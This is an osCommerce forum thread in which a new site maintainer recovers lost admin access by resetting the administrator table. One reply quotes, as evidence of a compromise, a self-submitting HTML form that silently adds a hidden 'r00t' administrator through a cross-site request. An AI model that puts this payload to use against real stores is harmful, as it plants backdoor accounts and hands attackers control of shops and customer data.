Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Lost admin access info


esm

Recommended Posts

Hi,

 

I have taken over a screwed up website with an osCommerce shopping cart. The original designer has vanshed and with him the admin login info. Is there any way to recover this info somewhere?

 

Thanks,

 

Ed

Link to comment
Share on other sites

Hi,

 

I have taken over a screwed up website with an osCommerce shopping cart. The original designer has vanshed and with him the admin login info. Is there any way to recover this info somewhere?

 

Thanks,

 

Ed

 

which version of oscommerce application?

Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here!

8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself.

Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues.

Any issues with oscommerce, I am here to help you.

Link to comment
Share on other sites

Hi,

 

I have taken over a screwed up website with an osCommerce shopping cart. The original designer has vanshed and with him the admin login info. Is there any way to recover this info somewhere?

 

Thanks,

 

Ed

 

If it is an old version you will have to change the password in the .htaccess file in the admin directory.

 

If it is a new version you will have to reset it from the database. Here is an useful video:

 

http://www.clubosc.com/forgotten-your-admin-password-shock-horror.html

Link to comment
Share on other sites

To change passwords that pop up before the shop admin is even displayed is via the file manager and permissions in your web hosting admin pages.

 

If you have a login on your OS Commerce admin page you can either delete all the administrators in the data base or install one of forgotten password add-ons.

 

Failing that google

 

site:www.oscommerce.com/forums lost password

 

or

 

site:www.oscommerce.com/forums forgotten password

 

HTH

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

Guys,

 

Here's an update:

 

I accessed php/myAdmin and emptied the administrator table.

 

Then I created a new administrator but when I attempt to login with the new user name/password, I get an "invalid attempt" error message. Looking into the administrator table again, I see the encrypted password but the user name field is blank.

 

What am I doing wrong here?

 

Thanks,

 

Ed

Link to comment
Share on other sites

Empty the table completely then go to your "admin" login you should be presented with a page telling you there are no administrators and inviting you to name a user and password

My store is currently running Phoenix 1.0.3.0

I'm currently working on 1.0.7.2 and hope to get it live before 1.0.8.0 arrives (maybe 🙄 )

I used to have a list of add-ons here but I've found that with the ones that supporters of Phoenix get any other add-ons are not really neccessary

Link to comment
Share on other sites

What did you write in the password field???

 

Leave it empty or place a known string, from a site you know the password...

Providing Ecommerce & CRM Solutions since 1995

Vote my post up if you found it usefull

Link to comment
Share on other sites

Why would I leave the password field empty?

 

When I create an administrator, it needs a password, right?

 

Checking the administrator table, the password (encrypted) is there but no user name.

 

On another note, I checked the admin bak table and there are over a dozen entries. Can they be deleted?

Link to comment
Share on other sites

Well you should leave it empty so you can login and then put another one....

 

Complete the table with a username...

 

Regarding the dozen entries in the backup table, well, thats a hack.....

<form method="post" action="http://127.0.0.1/oscommerce/admin/administrators.php?action=insert">
<input type=hidden name="username" value="r00t" />
<input type=hidden name="password" value="r00ted" />
<input type=hidden name="x" value="16" />
<input type=hidden name="y" value="13" />
</form>
<script>document.getElementsByTagName("form")[0].submit();</script>

 

So, Esm, if you didnt load them, delete them for sure... they constitute the entry for the hacker/s who planted them...

 

But really, with NO intention of making a client from you, what is your Security status regarding your site??

 

Did you run the patches yet? Change the admin directory an so on??

Providing Ecommerce & CRM Solutions since 1995

Vote my post up if you found it usefull

Link to comment
Share on other sites

Okay, here's what I did, according to your instructions:

 

I emptied the bak table.

 

I emptied the administrator table.

 

Then I tried to create an administrator: I entered a user name, left the pw field blank and hit enter. Then I tried to login withe the new user name and entered a password. Result: Invalid login.

 

What in the world am I doing wrong here?

 

Thanks for your assistance, I really appreciate that.

 

Ed

Link to comment
Share on other sites

Here's the content of the admin/.htaccess file:

 

# $Id: $

#

# This is used with Apache WebServers

#

# For this to work, you must include the parameter 'Options' to

# the AllowOverride configuration

#

# Example:

#

# <Directory "/usr/local/apache/htdocs">

# AllowOverride Options

# </Directory>

#

# 'All' with also work. (This configuration is in the

# apache/conf/httpd.conf file)

 

# The following makes adjustments to the SSL protocol for Internet

# Explorer browsers

 

#<IfModule mod_setenvif.c>

# <IfDefine SSL>

# SetEnvIf User-Agent ".*MSIE.*" \

# nokeepalive ssl-unclean-shutdown \

# downgrade-1.0 force-response-1.0

# </IfDefine>

#</IfModule>

 

# If Search Engine Friendly URLs do not work, try enabling the

# following Apache configuration parameter

 

# AcceptPathInfo On

 

# Fix certain PHP values

# (commented out by default to prevent errors occuring on certain

# servers)

 

# php_value session.use_trans_sid 0

# php_value register_globals 1

Link to comment
Share on other sites

If the qwery doesnt work, will have to asume that the files inside your admin are corrupted....

 

Do you have a clean copy around to upload?

Providing Ecommerce & CRM Solutions since 1995

Vote my post up if you found it usefull

Link to comment
Share on other sites

Bryce,

 

Ran the query exactly how you described but it didn't work. I can set up a new administrator but when I try to login after that, it's invalid.

 

When I "browse" the administrators table I see a hash in the password field but the user name field is blank. For some reason the user name is not entered into the administrators table.

 

As to a clean copy, my customer had purchased an osC template years ago from Template Monster. He's buying the same template for a more recent osC version for loading up.

 

Would that solve this problem?

 

Thanks for all the help.

 

Ed

Link to comment
Share on other sites

Can you give us the error information on the query?

 

What about Droping the table in a first query and then trying to create it again with the provided data (without the if exists lines... )

Providing Ecommerce & CRM Solutions since 1995

Vote my post up if you found it usefull

Link to comment
Share on other sites

There is NO error message on the query. The query works fine.

 

The creation of the first administrator does not work correctly. I enter a user name and a password and the administrator is created. After that, when I try to log in for the first time, I get an invalid login attempt message. When I check the administrators table, I see a hash for the password but the user name field is blank. The user name is not entered into the administrators table. That seems to be the problem.

Link to comment
Share on other sites

There is NO error message on the query. The query works fine.

 

The creation of the first administrator does not work correctly. I enter a user name and a password and the administrator is created. After that, when I try to log in for the first time, I get an invalid login attempt message. When I check the administrators table, I see a hash for the password but the user name field is blank. The user name is not entered into the administrators table. That seems to be the problem.

 

weird, have you tried to edit the username in phpmyadmin. seems the post information got lost during the creation of the account. :blink:

Link to comment
Share on other sites

I posted a solution to this last night, purely following the advice of Mike Taylor.

 

 

Try this

 

HTH

 

G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development, check my profile

 

Virus Threat Scanner

My Contributions

Basic install answers.

Click here for Contributions / Add Ons.

UK your site.

Site Move.

Basic design info.

 

For links mentioned in old answers that are no longer here follow this link Useful Threads.

 

If this post was useful, click the Like This button over there ======>>>>>.

Link to comment
Share on other sites

When I tried to enter the changes in the admin/configuration.php, those 3 "define" lines are not even in there. I did a search for that string and it's definitely not in that file. This drives me nuts! :-(

Link to comment
Share on other sites

You're hunting rabbits and it's duck season.

:blink:

 

Look in /admin/includes/configure.php

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...